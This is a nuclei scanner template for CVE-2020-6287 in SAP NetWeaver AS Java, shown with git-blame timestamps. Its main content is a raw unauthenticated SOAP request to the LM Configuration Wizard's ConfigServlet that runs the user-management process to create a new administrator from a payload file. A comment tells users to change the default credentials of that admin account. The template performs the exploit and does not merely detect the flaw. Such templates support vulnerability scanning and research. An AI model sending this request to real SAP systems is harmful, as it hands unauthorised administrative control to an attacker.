nuclei-templates/cves/2020/CVE-2020-6287.yaml

38 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-6287
2020-07-21 06:53:00 +00:00
info:
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
author: dwisiswant0
severity: critical
tags: cve,cve2020,sap
2020-07-21 06:53:00 +00:00
# Affected Versions: 7.30, 7.31, 7.40, 7.50
# p.s:
# > Don't forget to change the default credentials
# > to create new admin in associated file:
# > `payloads/CVE-2020-6287.xml`
# Ref:
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
requests:
- payloads:
2021-01-09 13:28:57 +00:00
data: helpers/payloads/CVE-2020-6287.xml
2020-07-21 06:53:00 +00:00
raw:
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=UTF-8
2020-07-21 08:00:14 +00:00
Connection: close
2020-07-21 06:53:00 +00:00
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
2020-07-21 06:53:00 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "urn:CTCWebServiceSi"
part: body
- type: status
status:
- 200